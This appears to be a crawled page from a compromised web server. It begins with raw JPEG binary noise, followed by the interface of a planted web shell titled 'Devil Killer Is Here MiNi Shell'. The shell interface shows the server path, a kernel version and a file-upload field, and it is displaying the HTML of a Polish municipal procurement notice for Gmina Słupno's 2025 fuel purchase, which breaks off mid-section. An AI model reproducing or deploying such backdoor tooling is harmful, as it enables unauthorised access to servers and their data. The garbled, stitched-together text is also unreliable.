JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241125/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241125/0061429101-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Bezgotówkowy zakup paliwa do pojazdów służbowych oraz sprzętu mechanicznego Gminy Słupno w 2025r. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA SŁUPNO</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Wójt Gminy Słupno</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 611015997</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Miszewska 8A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Słupno</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">09-472</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL923 - Płocki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ug@slupno.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.ugslupno.bip.org.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Bezgotówkowy zakup paliwa do pojazdów służbowych oraz sprzętu mechanicznego Gminy Słupno w 2025r. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-38e6a527-0d74-4139-a07f-2cbcbe1d4c1d</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00614291</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-11-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00034083/12/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Bezgotówkowy zakup paliwa do pojazdów służbowych oraz sprzętu mechanicznego Gminy Słupno w 2025r.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-38e6a527-0d74-4139-a07f-2cbcbe1d4c1d <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia publicznego komunikacja między<br/>Zamawiającym, a Wykonawcami odbywa się przy użyciu Platformy<br/>e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl<br/>W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację wykonawcy i Zamawiającego za pośrednictwem<br/>Platformy e-Zamówienia, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail:<br/>ug@slupno.eu (nie dotyczy składania ofert/wniosków o dopuszczenie do udziału w postępowaniu).</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział<br/>w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na Platformie e-Zamówienia. Szczegółowe informacje<br/>na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platf. e-Zam. określa Reg. Platf. e-Zam. dostępny na str.<br/>intern. https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”.<br/>Przeglądanie i pobieranie publicznej treści dokum. postęp. nie wymaga posiadania konta na Platf. e-Zam. ani logowania.<br/>Korzystanie z Platf.e-Zam. jest bezpłatne.<br/>Sposób i forma sporządzenia dokum. muszą być zgodne z wym. określonymi w Rozp. PRM z dnia 30.12. 2020r. w sprawie sposobu<br/>sporządzania i przekazywania inf. oraz wymagań techn. dla dokum. elektr. oraz środków kom. elektr. w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie , przepisami wydanymi na podstawie art. 18 ustawy z dnia 17.02.2005r. o informatyzacji<br/>działalności podmiotów realizujących zadania publiczne a także Rozp. Ministra Rozwoju, Pracy i Technologii z dnia 23.12.2020 r. w<br/>sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń jakich może żądać zamawiający od<br/>wykonawcy<br/>Dokumenty elektroniczne, o których mowa w rozp. PRM z dnia 30.12.2020r. w sprawie sposobu sporządzania i przekazywania<br/>informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o<br/>udzielenie zamówienia publicznego lub konkursie sporządza się w postaci elektronicznej, w formatach danych określonych w<br/>przepisach rozp.RM z dnia 12.04.2012r. w sprawie w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla<br/>rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych, z<br/>uwzględnieniem rodzaju przekazywanych danych i przekazuje się jako załączniki.<br/>Jeżeli dokumenty elektroniczne, przekazywane przy użyciu środków komunikacji elektronicznej, zawierają informacje stanowiące<br/>tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16.04.1993r. o zwalczaniu nieuczciwej konkurencji wykonawca, w<br/>celu utrzymania w poufności tych informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku, wraz z jednoczesnym<br/>zaznaczeniem w nazwie<br/>pliku „Dokument stanowiący tajemnicę przedsiębiorstwa”.<br/>Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy”<br/>na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji”<br/>służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta<br/>uproszczonego na Platformie e-Zamówienia.<br/>Warunkiem założenia konta Użytkownik konto uproszczone jest wypełnienie elektronicznego formularza rejestracyjnego dostępnego<br/>na stronie Platformy oraz potwierdzenie zapoznania się z Regulaminem korzystania z Platformy e-Zamówienia.<br/>Warunkiem założenia konta Użytkownika jest poświadczenie danych rejestracyjnych podmiotu kwalifikowanym podpisem<br/>elektronicznym, kwalifikowaną pieczęcią elektroniczną, podpisem zaufanym lub podpisem osobistym.<br/>Wszystkie wysłane i odebrane w postępowaniu przez wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie<br/>postępowania w zakładce „Komunikacja”.<br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy<br/>plików przesyłanych jako załączniki do jednego formularza).<br/>Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje<br/>dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą<br/>skorzystać ze wsparcia technicznego dostępnego poprzez formularz udostępniony na stronie internetowej<br/>https://ezamowienia.gov.pl w zakładce „Zgłoś problem”.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SZP.271.1.26.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest sukcesywny bezgotówkowy zakup w 2025 roku następujących paliw płynnych do pojazdów służbowych oraz sprzętu zmechanizowanego Zamawiającego:<br/><br/>- olej napędowy ON – ok. 32 650 l<br/>- benzyna bezołowiowa PB 95 – ok. 3 270 l <br/>- benzyna bezołowiowa PB 98 – ok. 600 l <br/><br/>Podane ilości paliwa są wielkościami orientacyjnymi i nie wiążą Zamawiającego, a ich zakup będzie realizowany wg bieżących potrzeb – maksymalnie do wysokości środków finansowych przeznaczonych na ten cel.<br/><br/><br/>Zamówienie dotyczy następujących jednostek Gminy Słupno:<br/>1.	Urząd Gminy Słupno – pojazdy i sprzęt użytkowane przez pracowników fizycznych <br/>2.	Odziały OSP z terenu Gminy Słupno – pojazdy i sprzęt użytkowane w przez OPS Miszewko Strzałkowskie, OSP Cekanowo, OSP Słupno, OSP Gulczewo, OSP Święcieniec, OSP Mijakowo<br/><br/><br/>Lp.	Wykaz pojazdów służbowych Numer rejestracyjny	Liczba przypisanych kart <br/>[szt.]<br/>URZĄD GMINY SŁUPNO<br/>1	Peugeot Boxer	WPL 39102	1<br/>2	Toyota Hiace WPL 64966	1<br/>3	VW LT 35	WPL 59649	1<br/>4	Ciągnik Landini WPL YS57	1<br/>5	Ciągnik New Holland	WPL 15W2	1<br/>6	Ciągnik TYM	WPL 81N5	1<br/>7	Ciągnik KIOTI	WPL 03V8	1<br/>8	Autobus Mercus TGE	WPL 97359	1<br/>9	Fiat Scudo	WPL 38099	1<br/>10	Fiat Ducato	WPL MY90	1<br/>11	Toyota Hiace	WPL 82689	1<br/>12	Nissan Terrano	WPL MS25	1<br/>13	TAFE 6028 M	WPL 4EA9	1<br/> OSP Słupno<br/>14	Nissan Patrol	WPL XM57	1<br/>15	JELCZ 004	PLM 6233	1<br/>16	GAZ	WPL 53VL	1<br/>17	Mercedes Atego	WPL 09998	1<br/>18	Renault MD B3D	WPL 51998	1<br/>19	Ciągnik rolniczy CF MOTO	WPL 72Y8	1<br/>OSP Mijakowo<br/>20	Renault Midliner S180	WPL 2AX8	1<br/>OSP Gulczewo<br/>21	STAR GBA	WPL V095	1<br/>OSP Miszewko Strzałkowskie <br/>22	Toyota Hiace	WPL 49137	1<br/>OSP Święcieniec <br/>23	GAZ GLBA	WPL GP55	1<br/>OSP Cekanowo <br/>24	Renault MD B3D	WPL 64165	1<br/>Razem: 24<br/>SPRZĘT ZMECHANIZOWANY<br/>25	sprzęt zmechanizowany Urzędu Gminy Słupno	-	8<br/>26	sprzęt zmechanizowany OSP	-	7<br/>Razem: 15<br/><br/>Łącznie kart:	39<br/><br/>Wymagania dotyczące przedmiotu zamówienia:<br/><br/>1.	Zakupione paliwa muszą spełniać wymagania określone w rozporządzeniu Ministra Gospodarki z dnia 9 października 2015r. w sprawie wymagań jakościowych dla paliw ciekłych (Dz.U.2023.1314, t.j. z dnia 2023.07.11) oraz odpowiednio Norm PN – EN 228 (PB) i PN – EN 590 (ON).<br/><br/>2.	Realizacja zamówienia odbywać się będzie:<br/>a)	w systemie bezgotówkowym, na podstawie identyfikacyjnych magnetycznych lub chipowych kart paliwowych, wydanych przez Wykonawcę dla pojazdów oraz sprzętu zmechanizowanego Zamawiającego,<br/>b)	na terenie kraju z zastrzeżeniem, że Wykonawca musi posiadać co najmniej jedną stację paliw w promieniu 5 km od siedziby Zamawiającego tj. Urzędu Gminy w Słupnie adres: 09-472 Słupno ul. Miszewska 8A,<br/>c)	sukcesywnie, poprzez tankowanie pojazdów oraz sprzętu Zamawiającego, stosownie do jego potrzeb, <br/>d)	tankowanie pojazdów odbywać się będzie do zbiorników paliwa, a sprzętu do kanistrów lub beczek. <br/>3.	Zamówienie obejmuje również dostawę magnetycznych lub chipowych kart paliwowych przypisanych do poszczególnych pojazdów w przypadku tankowania sprzętu zmechanizowanego.<br/><br/>Wielkość lub zakres zamówienia:<br/>1.	Ilość zamawianych paliw ma charakter szacunkowy.<br/>2.	Umowa ulega rozwiązaniu z chwilą wyczerpania kwoty jaką zaplanowano do sfinansowania zadania.<br/>3.	W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach. W takim przypadku Wykonawca może żądać wyłącznie wynagrodzenia należnego z tytułu wykonania części umowy.<br/><br/>Warunki realizacji zamówienia:<br/>1.	Wykonawca wyda Zamawiającemu nieodpłatnie karty paliwowe, po jednej dla każdego pojazdu silnikowego oraz karty paliwowe umożliwiające pobieranie paliwa do beczek lub kanistrów (zaopatrzenie w paliwo sprzętu zmechanizowanego) w ilości zgodnej z Załącznikiem do umowy. Zamawiający zastrzega możliwość modyfikacji Załącznika do umowy. <br/>2.	Karty paliwowe wydane dla każdego pojazdu silnikowego winny umożliwiać pobieranie paliwa klasy standard stosownie do potrzeb Zamawiającego. <br/>3.	Na karcie paliwowej podane będą co najmniej następujące dane:<br/>a)	nr karty,<br/>b)	data ważności karty,<br/>c)	nazwa użytkownika (Zamawiającego),<br/>d)	nr rejestracyjny pojazdu lub skrócona nazwa jednostki w przypadku zakupu paliwa do sprzętu.<br/>4.	Wykonawca zobowiązany będzie do jednoznacznej identyfikacji terminu i ilości wydanego paliwa z pojazdem lub jednostką Zamawiającego, na którą zostało pobrane paliwo, poprzez wydanie osobie pobierającej paliwo, wydruku zawierającego następujące informacje identyfikacyjne:<br/>a)	nr karty,<br/>b)	data i dokładny czas przeprowadzenia transakcji,<br/>c)	nr i adres stacji paliw, na której dokonano transakcji,<br/>d)	nr rejestracyjny w przypadku tankowania pojazdu,<br/>e)	rodzaj paliwa,<br/>f)	ilość zakupionego paliwa,<br/>g)	wartość transakcji.<br/>5.	Raporty transakcji sporządzane będą przez Wykonawcę nieodpłatnie raz w miesiącu za okres od 1 do ostatniego dnia każdego miesiąca.<br/><br/>Warunki gwarancji :<br/>1.	Wykonawca gwarantuje jakość paliw zgodną z obowiązującymi normami i przepisami.<br/>2.	Wykonawca zobowiązany będzie, na żądanie Zamawiającego, do przedstawienia dokumentów i świadectw jakości paliwa, w terminie 7 dni od dnia otrzymania pisma zawierającego takie żądanie.<br/>3.	W zakresie reklamacji związanej z niewłaściwą jakością paliw obowiązują następujące zasady:<br/>a)	Reklamacja powinna zostać złożona na piśmie wraz z uzasadnieniem.<br/>b)	Wykonawca powinien rozpatrzyć reklamację w ciągu 14 dni od momentu jej otrzymania. W przypadku, gdy rozpatrzenie reklamacji wymaga zebrania dodatkowych informacji, w szczególności uzyskania od Zamawiającego lub Operatora stacji paliw, Wykonawca rozpatrzy reklamacje w terminie 14 dni od dnia uzyskania tych informacji.<br/>c)	Nie powiadomienie Zamawiającego w w/w terminie o sposobie rozpatrzenia reklamacji jest równoznaczne z jej uwzględnieniem.<br/>d)	W przypadku uznania reklamacji Wykonawca zobowiązany jest pokryć wartość poniesionej szkody do wysokości udokumentowanej odpowiednimi rachunkami, <br/>e)	Zapis pkt d nie pozbawia prawa Zamawiającego dochodzenia przed sądem odszkodowania w pełnej wysokości zgodnie z obowiązującymi przepisami. <br/><br/>Warunki dodatkowe:<br/>1.	Wykonawca winien dysponować siecią stacji paliw na terenie kraju z zastrzeżeniem, że musi posiadać co najmniej jedną stację paliw w promieniu 5 km od siedziby Zamawiającego tj. Urzędu Gminy w Słupnie adres: 09-472 Słupno ul. Miszewska 8A, umożliwiających pobieranie paliwa do pojazdów oraz sprzętu Zamawiającego.<br/><br/>2.	Oferta winna zawierać oświadczenie, potwierdzające spełnienie powyższych warunków.<br/><br/>3.	Przedmiot zamówienia będzie odbierany przez Zamawiającego sukcesywnie, stosownie do jego potrzeb.<br/><br/>4.	Rozliczenie przedmiotu umowy będzie odbywało się jeden raz w miesiącu zbiorczymi fakturami ze wszystkich dokonanych transakcji zakupu paliwa w okresach od 1 do ostatniego dnia każdego miesiąca, na podstawie prowadzonej dokumentacji każdorazowego zakupu bezgotówkowego, przy czym za dzień wykonania uznaje się ostatni dzień danego miesiąca.<br/><br/>5.	Do każdej faktury wystawiane będą zestawienia wszystkich transakcji, dokonanych w danym okresie rozliczeniowym, zawierające następujące dane:<br/>a)	nazwę produktu,<br/>b)	nr rejestracyjny pojazdu lub adnotacja „sprzęt” w przypadku zakupu paliwa do sprzętu,<br/>c)	nr karty,<br/>d)	miejscowość i nr stacji,<br/>e)	ilość pobranego paliwa,<br/>f)	cenę jednostkową paliwa widniejącą na dystrybutorze w danej stacji paliw w momencie tankowania,<br/>g)	wartość netto,<br/>h)	wartość podatku VAT,<br/>i)	wartość brutto,<br/>j)	wartość udzielonego upustu.<br/><br/>6.	Termin płatności – 30 dni od daty wpływu faktury do Zamawiającego.<br/><br/>7.	Wykonawca umożliwi Zamawiającemu pobieranie z poziomu przeglądarki internetowej wszystkich transakcji wykonanych kartami paliwowymi.<br/><br/>8.	Wykonawca zobowiązuje się do dostarczenia paliwa, stanowiącego przedmiot zamówienia spełniającego normy jakościowe pod rygorem dochodzenia roszczeń na podstawie wyników badań laboratoryjnych zlecanych przez PIH na wniosek Zamawiającego. W okresie zimowym Wykonawca winien zabezpieczyć zamianę paliwa – oleju napędowego ON z letniego na zimowy. Przez okres zimowy należy rozumieć okres od 16 listopada do 28 lutego.<br/><br/>9.	Sprzedaż odbywać się będzie wg cen obowiązujących w dniu zakupu paliwa z uwzględnieniem upustu/marży procentowego zadeklarowanego w ofercie.<br/><br/>CPV: 09100000-0 Paliwa 09134100-8 Olej napędowy 09132100-4 Benzyna bezołowiowa.<br/><br/>Projektowane postanowienia umowy zawiera Dział II. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09100000-0 - Paliwa</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">09134100-8 - Olej napędowy</p> <p class="mb-0">09132100-4 - Benzyna bezołowiowa</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> I. O zamówienie publiczne mogą ubiegać się Wykonawcy spełniający warunki, o których mowa w art. 112 ust. 2 ustawy Pzp, tj.: <br/>1) zdolności do występowania w obrocie gospodarczym; Zamawiający nie określa wymagań w tym zakresie <br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej o ile wynika to z odrębnych przepisów; <br/>Wykonawca spełni warunek, jeżeli wykaże, że posiada aktualną koncesję na obrót paliwami ciekłymi, w zakresie wymaganym ustawą z dnia 10.04.1997 r. Prawo energetyczne.<br/>3) sytuacji ekonomicznej lub finansowej; Zamawiający nie określa wymagań w tym zakresie <br/>4) zdolności technicznej lub zawodowej; Zamawiający nie określa wymagań w tym zakresie <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych 